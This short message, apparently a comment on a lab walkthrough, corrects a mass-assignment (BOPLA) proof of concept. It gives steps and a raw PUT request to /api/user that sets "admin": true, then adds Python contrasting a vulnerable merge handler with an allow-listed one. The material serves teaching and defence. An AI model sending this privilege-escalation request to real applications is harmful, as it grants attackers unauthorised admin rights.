Hey man, I was going through the walkthrough & I noticed that the PoC of "mass Assignment" aka "BOPLA" is incorrect.
- Create a user in the application.
- Check the JSON objects in the HTTP Response.
- Login with the created user to fetch JWT Token.
- Fetch the current user information using the /api/user endpoint.
- Change the HTTP method to PUT, copy the JSON object present in the HTTP Response Header, paste it in the HTTP Request Body, and keep only the admin JSON object with its value as true.
request:
PUT /api/user HTTP/1.1
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Authorization: Token xxxxxx
User-Agent: PostmanRuntime/7.54.0
Accept: */*
Postman-Token: a898b3be-398c-48ca-8f2a-f340f61be5b7
Host: localhost:8000
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 23
{"user":{"admin":true}}
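For readers checking their own /api/user handler, the following is an added example (not code from the walkthrough or the application under discussion) modelling why a PUT that merges the whole request body into the stored user enables mass assignment, and how a field allow-list stops it. The record layout, the allow-list `USER_WRITABLE_FIELDS`, and the two handler functions are assumptions for illustration.

```python
import json

# Constructed sample of the stored user record (assumption, not the app's schema).
STORED_USER = {"id": 7, "username": "alice", "email": "alice@example.com", "admin": False}

# Fields a user may legitimately change on their own account (assumed allow-list).
USER_WRITABLE_FIELDS = frozenset({"username", "email", "bio", "image"})

# The request body from the report above.
PAYLOAD = '{"user":{"admin":true}}'


def update_user_vulnerable(user: dict, body: str) -> dict:
    """Naive handler: every key under "user" is copied onto the record."""
    data = json.loads(body).get("user", {})
    updated = dict(user)
    updated.update(data)  # attacker-controlled "admin": true lands on the record
    return updated


def update_user_hardened(user: dict, body: str) -> tuple:
    """Allow-listed handler: only writable fields are applied; everything else
    is returned as a rejected list so it can be logged or turned into a 400."""
    data = json.loads(body).get("user", {})
    if not isinstance(data, dict):
        raise ValueError("user must be a JSON object")
    rejected = sorted(k for k in data if k not in USER_WRITABLE_FIELDS)
    updated = dict(user)
    for key, value in data.items():
        if key in USER_WRITABLE_FIELDS:
            updated[key] = value
    return updated, rejected


if __name__ == "__main__":
    print(update_user_vulnerable(STORED_USER, PAYLOAD)["admin"])  # True: privilege escalated
    print(update_user_hardened(STORED_USER, PAYLOAD))  # admin stays False, ["admin"] rejected
```

A server-side check that the rejected list is empty (or at least logged) is the detection point: a legitimate client never sends `admin` in this body.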